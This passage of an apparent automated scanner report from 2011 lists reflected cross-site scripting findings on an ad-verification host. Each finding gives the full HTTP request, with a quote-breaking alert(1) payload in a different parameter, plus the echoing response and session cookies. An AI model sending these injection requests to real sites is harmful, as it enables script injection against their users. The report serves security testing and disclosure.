Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=69EE2C02A034E53F3487BFF66221629C; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:05 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013e47fe"-alert(1)-"368a11f0bb0/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnb
...[SNIP]...

3.55. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc440"-alert(1)-"00fb7ba3ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761bc440"-alert(1)-"00fb7ba3ad/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=45E88DC23A5A8A2690A5EE60938FB0AA; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 14:14:06 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761bc440"-alert(1)-"00fb7ba3ad/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r
...[SNIP]...

3.56. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97b0c"-alert(1)-"6d07663cecd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe97b0c"-alert(1)-"6d07663cecd/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=48D53ABF6D432D65D867150A061F06D6; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:06 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe97b0c"-alert(1)-"6d07663cecd/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.682846254
...[SNIP]...

3.57. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [dom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the dom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56302"-alert(1)-"72eb01cc176 was submitted in the dom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com56302"-alert(1)-"72eb01cc176&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A8F511A254DF558DF8E955379364263A; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:03 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%
...[SNIP]...
61/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com56302"-alert(1)-"72eb01cc176&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:
...[SNIP]...

3.58. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [flash parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4edd0"-alert(1)-"397268e1b7 was submitted in the flash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=104edd0"-alert(1)-"397268e1b7&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7B485F6DF52FD75588CACA9D164630B8; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 14:14:01 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=104edd0"-alert(1)-"397268e1b7&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : ""
...[SNIP]...

3.59. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1016a"-alert(1)-"8a2a19e0c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298&1016a"-alert(1)-"8a2a19e0c61=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7B40AB30F9AE64DC9E037376DBA90E0; Path=/
Content-Type: text/javascript
Content-Length: 8182
Date: Thu, 16 Jun 2011 14:14:04 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%
...[SNIP]...
99615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298&1016a"-alert(1)-"8a2a19e0c61=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=functi
...[SNIP]...

3.60. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f39"-alert(1)-"05af1f5a88 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G8122011050620372663f39"-alert(1)-"05af1f5a88&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F5C02F00232911D43FB31AF9668F33CD; Path=/
Content-Type: text/javascript
Content-Length: 8178
Date: Thu, 16 Jun 2011 14:14:00 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G8122011050620372663f39"-alert(1)-"05af1f5a88&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   re
...[SNIP]...

3.61. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32514"-alert(1)-"c3a8816c231 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x32514"-alert(1)-"c3a8816c231&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D9A9EFC9766922B58D2919A8A6B5E351; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:02 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%
...[SNIP]...
pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x32514"-alert(1)-"c3a8816c231&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={IN
...[SNIP]...

3.62. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8283b"-alert(1)-"45c0841d410 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.68284625466912988283b"-alert(1)-"45c0841d410 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AACD697BED5EBDC4A06BA3FAE3526AE8; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:03 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%
...[SNIP]...
299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.68284625466912988283b"-alert(1)-"45c0841d410",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var z={INFO:"info",LOG:"log",DIR:"dir"};var k=function
...[SNIP]...

3.63. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44940"-alert(1)-"bd8a7dacc17 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$44940"-alert(1)-"bd8a7dacc17&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=79A64DCCFBFBEDA17ABE025016E66487; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:01 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%
...[SNIP]...
w/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$44940"-alert(1)-"bd8a7dacc17&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};

(function(){var f="3.6";var o=(adsafeVisParams.debug==="true");var y=2000;var
...[SNIP]...

3.64. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102761/PortalServe/ [time parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102761/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac968"-alert(1)-"4a48ffcbb04 was submitted in the time parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5ac968"-alert(1)-"4a48ffcbb04&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=97045199.1305396600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=39f460-12fefb35e4f-6db41cdc-2; __utma=97045199.1819266500.1305396600.1305396600.1305396600.1; JSESSIONID=C63ED20ECB256E0453300D10DB035B27

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85943EDCF033453598CD4119164AE719; Path=/
Content-Type: text/javascript
Content-Length: 8179
Date: Thu, 16 Jun 2011 14:14:01 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308233638695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10013/102761/PortalServe/?pid=1299615G81220110506203726&flash=10&time=4|9:14|-5ac968"-alert(1)-"4a48ffcbb04&redir=http://a1.interclick.com/icaid/167859/tid/47ffa59b-aa6c-4596-82d3-c25061d9fe99/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.6828462546691298",
   adsafeSep : "&",
   requrl : "",
   reqquery : "
...[SNIP]...

3.65. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10013/102769/PortalServe/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/ads.pointroll.com/10013/102769/PortalServe/

Issue detail

